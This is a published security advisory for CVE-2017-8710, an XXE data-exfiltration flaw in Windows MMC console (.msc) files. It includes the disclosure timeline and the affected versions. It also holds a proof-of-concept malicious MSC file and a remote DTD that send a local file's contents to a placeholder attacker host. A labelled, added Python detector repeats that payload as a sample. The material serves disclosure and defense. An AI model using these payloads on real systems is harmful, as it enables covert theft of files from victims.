Document Title:
===============
Microsoft Windows - MSC XXE Data Exfiltrate Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2094
MSRC Acknowledgements: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2017-8710
Public References:
https://nvd.nist.gov/vuln/detail/CVE-2017-8710
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8710
https://www.symantec.com/security_response/vulnerability.jsp?bid=100793
https://uk.norton.com/online-threats/microsoftwindowscve-2017-8710informationdisclosurevulne-100793-vulnerability.html
Video: https://www.vulnerability-lab.com/get_content.php?id=2095
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8710
CVE-ID:
=======
CVE-2017-8710
Release Date:
=============
2017-09-18
Vulnerability Laboratory ID (VL-ID):
====================================
2094
Common Vulnerability Scoring System:
====================================
4.3
Vulnerability Class:
====================
Filter or Protection Mechanism Bypass
Current Estimated Price:
========================
5.000€ - 10.000€
Product & Service Introduction:
===============================
The MSC file extension is a snap-in control file associated with Microsoft Management Console,
which was developed by Microsoft Corporation. Files affixed with this extension are also known
as Microsoft Saved Console Files. Microsoft Management Console allows users to customize the
console or modules to hold snap-ins. It is used to configure and monitor Windows computer
systems. The snap-in contains a program that provides additional administration management
like device management, system monitoring and disk defragmentation. A snap-in can hold
additional snap-in extensions. Users can create and customize MSC files to publish a collection
of tools or utilities to other users through email, network sharing or web posting. They can
also be assigned to other networks, users, and groups with policy settings. System administrators
may provide restrictions by customization. In case MMC fails to complete a normal shutdown, the
SMS.msc file may be removed from the system. Files in MSC format can be opened with Microsoft
Windows Server on Microsoft Windows platforms.
(Copy of the Homepage: https://www.reviversoft.com/file-extensions/msc )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered an XML external entity (XXE) data exfiltration vulnerability in the
official Microsoft Common Console Document (MSC; Saved Console & System Console) format that is associated with the
Microsoft Management Console (MMC) of multiple Microsoft Windows operating system products.
Vulnerability Disclosure Timeline:
==================================
2017-05-25: Researcher Notification & Coordination (SaifAllah benMassaoud)
2017-06-03: Vendor Notification (Microsoft Security Response Center)
2017-06-05: Vendor Notification / Security Update required (Microsoft Security Response Center)
2017-06-29: Vendor Notification / Plan to release it in September instead of August (Microsoft Security Response Center)
2017-08-11: Vendor Notification / CVE assigned (Microsoft Security Response Center)
2017-09-12: Security Acknowledgements ((Microsoft Security Response Center))
2017-09-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Microsoft Corporation
Product: Microsoft Windows - Operating System 7,8, 2008- & 2008 R2 - (x32 & x64)
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
An XML external entity (XXE) data exfiltration vulnerability has been discovered in the official Microsoft Common Console
Document (MSC; Saved Console & System Console) format that is associated with the Microsoft Management Console (MMC)
of multiple Microsoft Windows operating system products.
Attackers could create an MSC file containing specially crafted XML content that is designed to submit malicious input
to the affected software.
The vulnerability is due to improper parsing of XML content that contains a reference to an external entity. An attacker
could exploit this vulnerability by persuading an authenticated user to open a maliciously crafted MSC file. An exploit could
allow the attacker to conduct an XML external entity (XXE) attack, which the attacker could use to access sensitive information
on the targeted system that may aid in further attacks.
In all cases, the vulnerability could be used for data exfiltration and compromise of the victim's machine; exploitation relies on
social engineering (phishing, remote share & USB / HID attack, etc.).
The security risk of the xml external entity (XXE) data exfiltration vulnerability is estimated as medium.
The exploitation of the vulnerability does not require the target user to have any special permissions.
Successful exploitation of the vulnerability results in data exfiltration and computer system compromise.
Affected Software - File Type(s):
[+] Microsoft Common Console Document (.msc)
Affected:
Windows 7 for 32-bit Systems Service Pack 1
Windows 7 for x64-based Systems Service Pack 1
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for Itanium-Based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Tested on:
[+] Windows XP Service Pack 3
[+] Windows 7 Ultimate
[+] Windows 10 Pro
Proof of Concept (PoC):
=======================
An XML external entity (XXE) data exfiltration vulnerability can be exploited by local attackers without special user permissions.
For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below to continue.
1. The video above:
[+] Tested on Windows XP SP3
2. Local system group/user permission:
[+] Authenticated Users
PoC: Exploitation
## Malicious MSC file ##
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ENTITY % file SYSTEM "C:\Windows\[File-Name].ini">
<!ENTITY % dtd SYSTEM "http://x.x.x.x:443/PAYLOAD.dtd">
%dtd;]>
<pwn>&send;</pwn>
## PAYLOAD.DTD ##
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://x.x.x.x:443?%file;'>">
%all;
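As an added defender-side example (not part of the advisory), the following Python triage script flags the DTD constructs the PoC above depends on: a DOCTYPE in a console file, SYSTEM entity declarations pointing at local files or remote hosts, and parameter entity references that pull in a remote DTD. The two sample files, the `attacker.invalid` host and the `example.ini` path are constructed placeholders.

```python
import re

# Constructed sample mirroring the PoC structure; host and file are placeholders.
MALICIOUS_MSC = """<?xml version="1.0" ?>
<!DOCTYPE r [
<!ENTITY % file SYSTEM "C:\\Windows\\example.ini">
<!ENTITY % dtd SYSTEM "http://attacker.invalid:443/PAYLOAD.dtd">
%dtd;]>
<pwn>&send;</pwn>
"""

# Constructed benign console file: a normal MSC carries no DOCTYPE at all.
BENIGN_MSC = """<?xml version="1.0" encoding="UTF-8"?>
<MMC_ConsoleFile ConsoleVersion="3.0"><FrameState/></MMC_ConsoleFile>
"""

# DOCTYPE with an optional internal subset "[ ... ]" (lazy, so a "]" inside a
# path such as "[File-Name].ini" does not end the subset early).
DOCTYPE_RE = re.compile(r"<!DOCTYPE[^\[>]*(\[.*?\])?\s*>", re.S | re.I)
# General or parameter (%) entity declared with an external identifier.
ENTITY_RE = re.compile(r'<!ENTITY\s+(%\s*)?(\w+)\s+(SYSTEM|PUBLIC)\s+"?([^">]*)', re.I)
# Parameter entity reference inside the internal subset, e.g. %dtd;
PE_REF_RE = re.compile(r"%\w+;")


def classify(uri):
    """Label an entity target as remote (fetched over the network) or local file."""
    if re.match(r"[a-z][a-z0-9+.-]*://", uri, re.I) and not uri.lower().startswith("file:"):
        return "remote"
    return "local file"


def scan_msc(text):
    """Return a list of findings for DTD-based external references in an MSC
    document. An empty list means no DOCTYPE / entity constructs were seen."""
    findings = []
    m = DOCTYPE_RE.search(text)
    if not m:
        return findings
    findings.append("DOCTYPE present (MMC console files normally carry none)")
    subset = m.group(0)
    for pct, name, kind, uri in ENTITY_RE.findall(subset):
        kind_txt = "parameter" if pct else "general"
        findings.append(f"{kind_txt} entity '{name}' -> {kind} {uri!r} [{classify(uri)}]")
    if PE_REF_RE.search(subset):
        findings.append("parameter entity reference in internal subset (remote DTD expansion)")
    return findings


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_MSC), ("benign", BENIGN_MSC)):
        print(label, scan_msc(doc) or "clean")
```

Blocking on the DOCTYPE alone is the cheapest mail-gateway or endpoint rule, since legitimate console files are plain XML without a DTD.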
Solution - Fix & Patch:
=======================
Microsoft has addressed the vulnerability by changing how the affected software parses the delivered XML content.
Security Risk:
==============
The security risk of the XXE data exfiltration vulnerability is estimated as medium. (CVSS 4.3)
Credits & Authors:
==================
S.AbenMassaoud [[email protected]] - @benmassaou - https://www.vulnerability-lab.com/show.php?user=S.AbenMassaoud
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its
suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface
websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories
or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails,
phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™